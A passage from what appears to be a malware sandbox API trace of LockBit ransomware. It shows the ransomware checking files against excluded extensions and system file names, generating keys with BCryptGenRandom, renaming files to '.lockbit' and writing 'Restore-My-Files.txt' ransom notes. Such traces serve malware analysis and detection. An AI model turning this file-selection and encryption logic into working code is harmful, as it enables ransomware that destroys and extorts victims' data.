(lpString1=".ini", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152702.WMF") returned 1 [0145.994] lstrcmpiW (lpString1="ntldr", lpString2="J0152702.WMF") returned 1 [0145.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152702.WMF") returned 1 [0145.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152702.WMF") returned -1 [0145.994] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152702.WMF") returned -1 [0145.994] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152702.WMF") returned 1 [0145.994] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152702.WMF") returned -1 [0145.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned=".WMF" [0145.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.994] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.995] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.995] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.lockbit") returned 72 [0145.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0145.999] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.999] malloc (_Size=0x40068) returned 0x3df0008 [0145.999] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1208) returned 1 [0145.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.001] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.003] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.003] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.004] free (_Block=0x1fa2ed8) [0146.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.004] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.004] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x674, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152704.WMF", cAlternateFileName="")) returned 1 [0146.004] lstrcmpiW (lpString1=".", lpString2="J0152704.WMF") returned -1 [0146.004] lstrcmpiW (lpString1="..", lpString2="J0152704.WMF") returned -1 [0146.004] PathFindExtensionW (pszPath="J0152704.WMF") returned=".WMF" [0146.004] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.004] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.005] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.005] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152704.WMF") returned 1 [0146.006] lstrcmpiW (lpString1="ntldr", lpString2="J0152704.WMF") returned 1 [0146.006] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152704.WMF") returned 1 [0146.006] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152704.WMF") returned -1 [0146.006] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152704.WMF") returned -1 [0146.006] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152704.WMF") returned 1 [0146.007] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152704.WMF") returned -1 [0146.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned=".WMF" [0146.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.007] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.007] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.008] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.lockbit") returned 72 [0146.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.008] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.008] malloc (_Size=0x40068) returned 0x3e70008 [0146.008] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1652) returned 1 [0146.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0146.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0146.009] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0146.013] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.013] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.014] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.014] free (_Block=0x1fa2ed8) [0146.014] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.014] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.014] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.015] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x132c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152708.WMF", cAlternateFileName="")) returned 1 [0146.015] lstrcmpiW (lpString1=".", lpString2="J0152708.WMF") returned -1 [0146.015] lstrcmpiW (lpString1="..", lpString2="J0152708.WMF") returned -1 [0146.015] PathFindExtensionW (pszPath="J0152708.WMF") returned=".WMF" [0146.015] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.015] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.016] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.016] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152708.WMF") returned 1 [0146.017] lstrcmpiW (lpString1="ntldr", lpString2="J0152708.WMF") returned 1 [0146.017] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152708.WMF") returned 1 [0146.017] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152708.WMF") returned -1 [0146.017] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152708.WMF") returned -1 [0146.017] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152708.WMF") returned 1 [0146.017] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152708.WMF") returned -1 [0146.017] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.017] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned=".WMF" [0146.017] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.017] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.017] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.018] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.018] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.lockbit") returned 72 [0146.018] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0146.019] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.019] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.019] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4908) returned 1 [0146.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.020] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.024] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.024] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.024] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.024] free (_Block=0x1fa2ed8) [0146.025] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.025] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 